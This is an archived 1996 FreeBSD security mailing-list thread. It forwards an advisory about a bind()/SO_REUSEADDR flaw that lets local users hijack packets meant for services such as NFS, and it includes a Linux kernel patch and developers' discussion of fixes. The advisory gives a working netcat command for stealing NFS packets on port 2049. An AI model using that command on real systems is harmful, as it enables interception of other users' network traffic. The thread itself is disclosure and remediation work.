To: freebsd-security@freebsd.org
Subject: BoS: bind() Security Problems (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
Precedence: bulk

I tried to exploit the following security hole on my nfs-server running FreeBSD 2.1, but I'm not getting the expected exploit-results. Does this mean FreeBSD is safe (the following msg suggested the opposite)?

---------- Forwarded message ----------
Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
From: Aleph's K-Rad GECOS Field
To: linux-security@tarsier.cv.nrao.edu
Cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com, best-of-security@suburbia.net
Subject: BoS: bind() Security Problems

System Call:                bind()
Affected Operating System:  Linux, SunOS, FreeBSD, BSDI, Ultrix
                            Probably others.
Requirement:                account on system.
Security Compromise:        Stealing packets from nfsd, yppasswd, ircd, etc.
Credits:                    *Hobbit*
                            bitblt
                            Aleph One
Synopsis:                   bind() does not properly check to make sure there is not a socket already bound to INADDR_ANY on the same port when binding to a specific address.

On most systems, a combination of setting the SO_REUSEADDR socket option and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its udp packets/tcp connection.

Exploit:

Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz

Make sure an nfs server is running:

w00p% netstat -a | grep 2049
udp        0      0  *.2049                 *.*                    LISTEN

Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

Wait for packets to arrive.

Fix:

Linux: A patch has been sent to Linus and Alan Cox. It should be included with 1.3.60. My original patch (included below) allows for binds from the same uid, as some virtual hosting software like modified httpds and ftpds may break otherwise. Alan didn't like this, so all binds to the same port will not be allowed in newer kernels. You should be able to easily adapt this patch or Alan's patch to 1.2.13 without much trouble.

Others: Pray to your vendors.

--- begin patch ---
diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c
--- linux-1.3.57/net/ipv4/af_inet.c     Mon Dec 25 20:03:01 1995
+++ linux/net/ipv4/af_inet.c    Tue Jan 16 19:46:28 1996
@@ -46,6 +46,8 @@
  *              Germano Caronni :       Assorted small races.
  *              Alan Cox        :       sendmsg/recvmsg basic support.
  *              Alan Cox        :       Only sendmsg/recvmsg now supported.
+ *              Aleph One       :       Rogue processes could steal packets
+ *                                      from processes bound to INADDR_ANY.
  *
  *              This program is free software; you can redistribute it and/or
  *              modify it under the terms of the GNU General Public License
@@ -899,6 +901,12 @@
                        if (sk2->num != snum)
                                continue;               /* more than one */
 
+                       if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) &&
+                           current->euid != sk2->socket->inode->i_uid)
+                       {
+                               sti();
+                               return(-EADDRINUSE);
+                       }
                        if (sk2->rcv_saddr != sk->rcv_saddr)
                                continue;               /* socket per slot ! -FB */
                        if (!sk2->reuse || sk2->state==TCP_LISTEN)

Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Wed Jan 31 12:33:08 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA07558 for security-outgoing; Wed, 31 Jan 1996 12:33:08 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id MAA07553 for ; Wed, 31 Jan 1996 12:33:06 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <15055(6)>; Wed, 31 Jan 1996 12:32:31 PST
Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177479>; Wed, 31 Jan 1996 12:32:23 -0800
X-Mailer: exmh version 1.6.4 10/10/95
To: security@freebsd.org
Subject: Re: BoS: bind() Security Problems
In-reply-to: Your message of "Tue, 30 Jan 1996 15:18:21 PST."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 31 Jan 1996 12:32:12 PST
From: Bill Fenner
Message-Id: <96Jan31.123223pst.177479@crevenia.parc.xerox.com>
Sender: owner-security@freebsd.org
Precedence: bulk

My only comment is that Alan's stronger version of the patch will break at least xntpd, which binds to each address as well as INADDR_ANY. I don't have the time right now to think this through any further.

  Bill

From owner-freebsd-security Wed Jan 31 13:07:36 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA10741 for security-outgoing; Wed, 31 Jan 1996 13:07:36 -0800 (PST)
Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id NAA10732 for ; Wed, 31 Jan 1996 13:07:29 -0800 (PST)
Received: from localhost.cisco.com (localhost.cisco.com [127.0.0.1]) by puli.cisco.com (8.6.8+c/8.6.5) with SMTP id NAA18066; Wed, 31 Jan 1996 13:05:43 -0800
Message-Id: <199601312105.NAA18066@puli.cisco.com>
To: "Garrett A. Wollman"
Cc: security@freebsd.org
Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems
In-Reply-To: Your message of "Wed, 31 Jan 1996 14:30:09 EST." <9601311930.AA00772@halloran-eldar.lcs.mit.edu>
Date: Wed, 31 Jan 1996 13:05:43 -0800
From: Paul Traina
Sender: owner-security@freebsd.org
Precedence: bulk

> Date: Wed, 31 Jan 1996 14:30:09 -0500
> From: "Garrett A. Wollman"
> To: Paul Traina
> Cc: security@freebsd.org
> Subject: [cisco.external.bugtraq] Re: BoS: bind() Security Problems
>
> < said:
>
> > Yuck, I hate to think of what we're going to break when we fix this, but
> > we should definitely fix this, otherwise users can hose NFS & friends.
>
> Lots of stuff will get broken.  Although, it occurs to me...
>
> It should be possible to require that SO_REUSEPORT be specified on
> both the original and the duplicate sockets.  This way, those programs
> (like ALL UDP-based servers) for which this is a requirement will
> still be able to work with a minimum of modification.  We can't,
> however, require any modifications where multicast addresses are
> involved.

Correct, which is perfectly reasonable behavior.

From owner-freebsd-security Wed Jan 31 17:00:28 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA00606 for security-outgoing; Wed, 31 Jan 1996 17:00:28 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id RAA00592 for ; Wed, 31 Jan 1996 17:00:23 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <15742(13)>; Wed, 31 Jan 1996 16:59:48 PST
Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177479>; Wed, 31 Jan 1996 16:59:39 -0800
X-Mailer: exmh version 1.6.4 10/10/95
To: "Garrett A. Wollman"
cc: Paul Traina , security@freebsd.org
Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems
In-reply-to: Your message of "Wed, 31 Jan 1996 11:30:09 PST." <9601311930.AA00772@halloran-eldar.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 31 Jan 1996 16:59:29 PST
From: Bill Fenner Message-Id: <96Jan31.165939pst.177479@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org Precedence: bulk In message <9601311930.AA00772@halloran-eldar.lcs.mit.edu> Garrett write: >It should be possible to require that SO_REUSEPORT be specified on >both the original and the duplicate sockets. In fact, Stevens says that those are already the semantics for SO_REUSEPORT. Bill From owner-freebsd-security Thu Feb 1 06:41:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id GAA00219 for security-outgoing; Thu, 1 Feb 1996 06:41:05 -0800 (PST) Received: from relay.philips.nl (ns.philips.nl [130.144.65.1]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id GAA00205 for ; Thu, 1 Feb 1996 06:40:59 -0800 (PST) Received: (from smap@localhost) by relay.philips.nl (8.6.9/8.6.9-950414) id PAA07234; Thu, 1 Feb 1996 15:40:13 +0100 Received: from unknown(192.26.173.32) by ns.philips.nl via smap (V1.3+ESMTP) with ESMTP id sma007149; Thu Feb 1 15:39:07 1996 Received: from spooky.lss.cp.philips.com (spooky.lss.cp.philips.com [130.144.199.105]) by smtp.nl.cis.philips.com (8.6.10/8.6.10-0.9z-02May95) with ESMTP id PAA29834; Thu, 1 Feb 1996 15:39:56 +0100 Received: (from guido@localhost) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) id PAA18233; Thu, 1 Feb 1996 15:39:05 +0100 
From: Guido van Rooij Message-Id: <199602011439.PAA18233@spooky.lss.cp.philips.com> Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems To: wollman@lcs.mit.edu (Garrett A. Wollman) Date: Thu, 1 Feb 1996 15:39:05 +0100 (MET) Cc: pst@cisco.com, security@freebsd.org In-Reply-To: <9601311930.AA00772@halloran-eldar.lcs.mit.edu> from "Garrett A. Wollman" at Jan 31, 96 02:30:09 pm Reply-To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org Precedence: bulk Garrett A. Wollman wrote: > > < said: > > > Yuck, I hate to think of what we're going to break when we fix this, but > > we should definitely fix this, otherwise users can hose NFS & friends. > > Lots of stuff will get broken. Although, it occurs to me... > > It should be possible to require that SO_REUSEPORT be specified on > both the original and the duplicate sockets. This way, those programs > (like ALL UDP-based servers) for which this is a requirement will > still be able to work with a minimum of modification. We can't, > however, require any modifications where multicast addresses are > involved. Wouldn't it be reasonable to require that the process trying to bind to an already used port has the same effective uid as the original binder? I think this can be checked via the socket that corresponds tothe pcb, via its pgid pointer. Of course indeed not in multicast mode. 
-Guido From owner-freebsd-security Thu Feb 1 12:28:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA26508 for security-outgoing; Thu, 1 Feb 1996 12:28:03 -0800 (PST) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id MAA26474 for ; Thu, 1 Feb 1996 12:27:59 -0800 (PST) Received: from localhost.shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.3/8.7.3) with SMTP id MAA01487; Thu, 1 Feb 1996 12:27:14 -0800 (PST) Message-Id: <199602012027.MAA01487@precipice.shockwave.com> To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) cc: wollman@lcs.mit.edu (Garrett A. Wollman), security@freebsd.org Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems In-reply-to: Your message of "Thu, 01 Feb 1996 15:39:05 +0100." <199602011439.PAA18233@spooky.lss.cp.philips.com> Date: Thu, 01 Feb 1996 12:27:14 -0800 From: Paul Traina Sender: owner-security@freebsd.org Precedence: bulk Yeah, that's what I was thinking to kludge around this for backwards compatibility. Paul 